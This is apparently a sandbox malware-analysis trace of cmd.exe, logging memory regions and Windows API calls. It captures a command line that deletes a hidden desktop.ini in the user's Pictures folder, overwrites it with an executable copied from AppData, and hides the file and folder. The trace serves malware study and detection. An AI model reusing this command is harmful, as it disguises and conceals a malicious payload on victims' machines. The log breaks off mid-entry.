"C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 16671 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 16672 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 16673 start_va = 0x40000 end_va = 0x40fff entry_point 
= 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 16674 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 16675 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 16676 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 16677 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 16678 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 16679 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 16680 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 16787 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 16788 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 16789 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 16790 start_va = 0x100000 end_va = 0x10ffff entry_point = 0x0 region_type = 
private name = "private_0x0000000000100000" filename = "" Region: id = 16791 start_va = 0x430000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 16792 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 16793 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 16794 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 16795 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 16796 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 16797 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 16798 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 16799 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: 
"c:\\windows\\system32\\gdi32.dll") Region: id = 16800 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 16801 start_va = 0x110000 end_va = 0x1d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 16802 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 16803 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 16804 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 16805 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 16806 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 16807 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 16808 start_va = 0x2f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 16809 start_va = 0x530000 end_va = 0x112ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16810 start_va = 0x1130000 end_va = 0x1292fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001130000" filename = "" Region: id = 16872 start_va = 0x12a0000 end_va = 0x156efff entry_point = 0x12a0000 region_type = mapped_file name = 
"sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 247 os_tid = 0x85c [0143.736] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efbc4 | out: lpSystemTimeAsFileTime=0x2efbc4*(dwLowDateTime=0x8f9bf380, dwHighDateTime=0x1d440a9)) [0143.736] GetCurrentProcessId () returned 0xfdc [0143.736] GetCurrentThreadId () returned 0x85c [0143.736] GetTickCount () returned 0x2ce65 [0143.736] QueryPerformanceCounter (in: lpPerformanceCount=0x2efbbc | out: lpPerformanceCount=0x2efbbc*=20052563583) returned 1 [0143.737] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0143.737] __set_app_type (_Type=0x1) [0143.737] __p__fmode () returned 0x76b331f4 [0143.737] __p__commode () returned 0x76b331fc [0143.737] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0143.738] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0143.738] GetCurrentThreadId () returned 0x85c [0143.738] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x85c) returned 0x38 [0143.738] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0143.738] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0143.738] SetThreadUILanguage (LangId=0x0) returned 0x409 [0143.738] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0143.738] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2efb54 | out: phkResult=0x2efb54*=0x0) returned 0x2 [0143.738] VirtualQuery (in: lpAddress=0x2efb8b, lpBuffer=0x2efb24, dwLength=0x1c | out: lpBuffer=0x2efb24*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, 
RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.738] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2efb24, dwLength=0x1c | out: lpBuffer=0x2efb24*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0143.738] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2efb24, dwLength=0x1c | out: lpBuffer=0x2efb24*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0143.738] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2efb24, dwLength=0x1c | out: lpBuffer=0x2efb24*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.738] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2efb24, dwLength=0x1c | out: lpBuffer=0x2efb24*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0143.738] GetConsoleOutputCP () returned 0x1b5 [0143.739] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0143.739] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0143.739] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.739] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0143.739] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.739] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0143.739] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.739] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0143.739] _get_osfhandle (_FileHandle=0) returned 0x3 [0143.739] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0143.740] _get_osfhandle (_FileHandle=0) returned 0x3 [0143.740] SetConsoleMode (hConsoleHandle=0x3, 
dwMode=0x1a7) returned 1 [0143.740] GetEnvironmentStringsW () returned 0x440520* [0143.740] FreeEnvironmentStringsW (penv=0x440520) returned 1 [0143.740] GetEnvironmentStringsW () returned 0x440520* [0143.740] FreeEnvironmentStringsW (penv=0x440520) returned 1 [0143.740] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eeac4 | out: phkResult=0x2eeac4*=0x40) returned 0x0 [0143.740] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eeacc, lpData=0x2eead0, lpcbData=0x2eeac8*=0x1000 | out: lpType=0x2eeacc*=0x0, lpData=0x2eead0*=0xd0, lpcbData=0x2eeac8*=0x1000) returned 0x2 [0143.740] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eeacc, lpData=0x2eead0, lpcbData=0x2eeac8*=0x1000 | out: lpType=0x2eeacc*=0x4, lpData=0x2eead0*=0x1, lpcbData=0x2eeac8*=0x4) returned 0x0 [0143.740] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eeacc, lpData=0x2eead0, lpcbData=0x2eeac8*=0x1000 | out: lpType=0x2eeacc*=0x0, lpData=0x2eead0*=0x1, lpcbData=0x2eeac8*=0x1000) returned 0x2 [0143.741] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eeacc, lpData=0x2eead0, lpcbData=0x2eeac8*=0x1000 | out: lpType=0x2eeacc*=0x4, lpData=0x2eead0*=0x0, lpcbData=0x2eeac8*=0x4) returned 0x0 [0143.741] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eeacc, lpData=0x2eead0, lpcbData=0x2eeac8*=0x1000 | out: lpType=0x2eeacc*=0x4, lpData=0x2eead0*=0x40, lpcbData=0x2eeac8*=0x4) returned 0x0 [0143.741] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eeacc, lpData=0x2eead0, lpcbData=0x2eeac8*=0x1000 | out: lpType=0x2eeacc*=0x4, lpData=0x2eead0*=0x40, lpcbData=0x2eeac8*=0x4) returned 0x0 [0143.741] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, 
lpType=0x2eeacc, lpData=0x2eead0, lpcbData=0x2eeac8*=0x1000 | out: lpType=0x2eeacc*=0x0, lpData=0x2eead0*=0x40, lpcbData=0x2eeac8*=0x1000) returned 0x2 [0143.741] RegCloseKey (hKey=0x40) returned 0x0 [0143.741] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eeac4 | out: phkResult=0x2eeac4*=0x40) returned 0x0 [0143.741] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eeacc, lpData=0x2eead0, lpcbData=0x2eeac8*=0x1000 | out: lpType=0x2eeacc*=0x0, lpData=0x2eead0*=0x40, lpcbData=0x2eeac8*=0x1000) returned 0x2 [0143.741] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eeacc, lpData=0x2eead0, lpcbData=0x2eeac8*=0x1000 | out: lpType=0x2eeacc*=0x4, lpData=0x2eead0*=0x1, lpcbData=0x2eeac8*=0x4) returned 0x0 [0143.741] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eeacc, lpData=0x2eead0, lpcbData=0x2eeac8*=0x1000 | out: lpType=0x2eeacc*=0x0, lpData=0x2eead0*=0x1, lpcbData=0x2eeac8*=0x1000) returned 0x2 [0143.741] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eeacc, lpData=0x2eead0, lpcbData=0x2eeac8*=0x1000 | out: lpType=0x2eeacc*=0x4, lpData=0x2eead0*=0x0, lpcbData=0x2eeac8*=0x4) returned 0x0 [0143.741] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eeacc, lpData=0x2eead0, lpcbData=0x2eeac8*=0x1000 | out: lpType=0x2eeacc*=0x4, lpData=0x2eead0*=0x9, lpcbData=0x2eeac8*=0x4) returned 0x0 [0143.741] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eeacc, lpData=0x2eead0, lpcbData=0x2eeac8*=0x1000 | out: lpType=0x2eeacc*=0x4, lpData=0x2eead0*=0x9, lpcbData=0x2eeac8*=0x4) returned 0x0 [0143.741] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eeacc, lpData=0x2eead0, lpcbData=0x2eeac8*=0x1000 | out: 
lpType=0x2eeacc*=0x0, lpData=0x2eead0*=0x9, lpcbData=0x2eeac8*=0x1000) returned 0x2 [0143.741] RegCloseKey (hKey=0x40) returned 0x0 [0143.741] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886372 [0143.741] srand (_Seed=0x5b886372) [0143.741] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\"" [0143.741] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\"" [0143.741] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0143.742] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x441c80, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0143.742] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0143.742] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0143.742] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0143.742] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0143.742] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0143.742] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0143.742] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0143.742] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0143.742] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0143.742] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0143.742] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0143.742] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0143.742] GetEnvironmentStringsW () returned 0x442670* [0143.743] FreeEnvironmentStringsW (penv=0x442670) returned 1 [0143.743] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0143.743] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0143.743] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0143.743] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0143.743] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0143.743] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0143.743] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0143.743] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0143.743] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0143.743] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0143.743] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef890 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0143.743] 
GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef890, lpFilePart=0x2ef88c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef88c*="Desktop") returned 0x18 [0143.743] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0143.743] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef60c | out: lpFindFileData=0x2ef60c) returned 0x440d00 [0143.743] FindClose (in: hFindFile=0x440d00 | out: hFindFile=0x440d00) returned 1 [0143.743] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef60c | out: lpFindFileData=0x2ef60c) returned 0x440d00 [0143.743] FindClose (in: hFindFile=0x440d00 | out: hFindFile=0x440d00) returned 1 [0143.744] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef60c | out: lpFindFileData=0x2ef60c) returned 0x440d00 [0143.744] FindClose (in: hFindFile=0x440d00 | out: hFindFile=0x440d00) returned 1 [0143.744] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0143.744] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0143.744] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0143.744] GetEnvironmentStringsW () returned 0x440520* [0143.744] FreeEnvironmentStringsW (penv=0x440520) returned 1 [0143.744] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0143.745] GetConsoleOutputCP () returned 0x1b5 [0143.745] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0143.745] GetUserDefaultLCID () returned 0x409 [0143.745] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0143.745] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x23, lpLCData=0x2ef9d0, cchData=128 | out: lpLCData="0") returned 2 [0143.745] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2ef9d0, cchData=128 | out: lpLCData="0") returned 2 [0143.745] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2ef9d0, cchData=128 | out: lpLCData="1") returned 2 [0143.745] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0143.745] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0143.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0143.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0143.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0143.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0143.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0143.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0143.746] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0143.746] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0143.746] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0143.747] GetConsoleTitleW (in: lpConsoleTitle=0x430b20, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0143.747] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0143.747] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0143.747] GetProcAddress (hModule=0x76910000, 
lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0143.747] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0143.748] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0143.748] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0143.748] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0143.748] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0143.748] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0143.748] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0143.748] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0143.751] _wcsicmp (_String1="del", _String2=")") returned 59 [0143.751] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0143.751] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0143.751] _wcsicmp (_String1="IF", _String2="del") returned 5 [0143.751] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0143.751] _wcsicmp (_String1="REM", _String2="del") returned 14 [0143.751] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0143.754] _wcsicmp (_String1="type", _String2=")") returned 75 [0143.754] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0143.754] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0143.754] _wcsicmp (_String1="IF", _String2="type") returned -11 [0143.754] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0143.754] _wcsicmp (_String1="REM", _String2="type") returned -2 [0143.754] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0143.922] SetErrorMode (uMode=0x0) returned 0x0 [0143.922] SetErrorMode (uMode=0x1) returned 0x0 [0143.922] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x440528, lpFilePart=0x2ef184 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef184*="Desktop") returned 0x18 [0143.922] SetErrorMode (uMode=0x0) returned 0x1 [0143.922] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0143.922] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0143.927] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0143.927] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2eef00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef00) returned 0xffffffff [0143.929] GetLastError () returned 0x2 [0143.929] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x2eef00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef00) returned 0xffffffff [0143.929] GetLastError () returned 0x2 [0143.929] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2eef00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef00) returned 0x440810 [0143.929] FindClose (in: hFindFile=0x440810 | out: hFindFile=0x440810) returned 1 [0143.930] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2eef00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef00) returned 0xffffffff [0143.930] GetLastError () returned 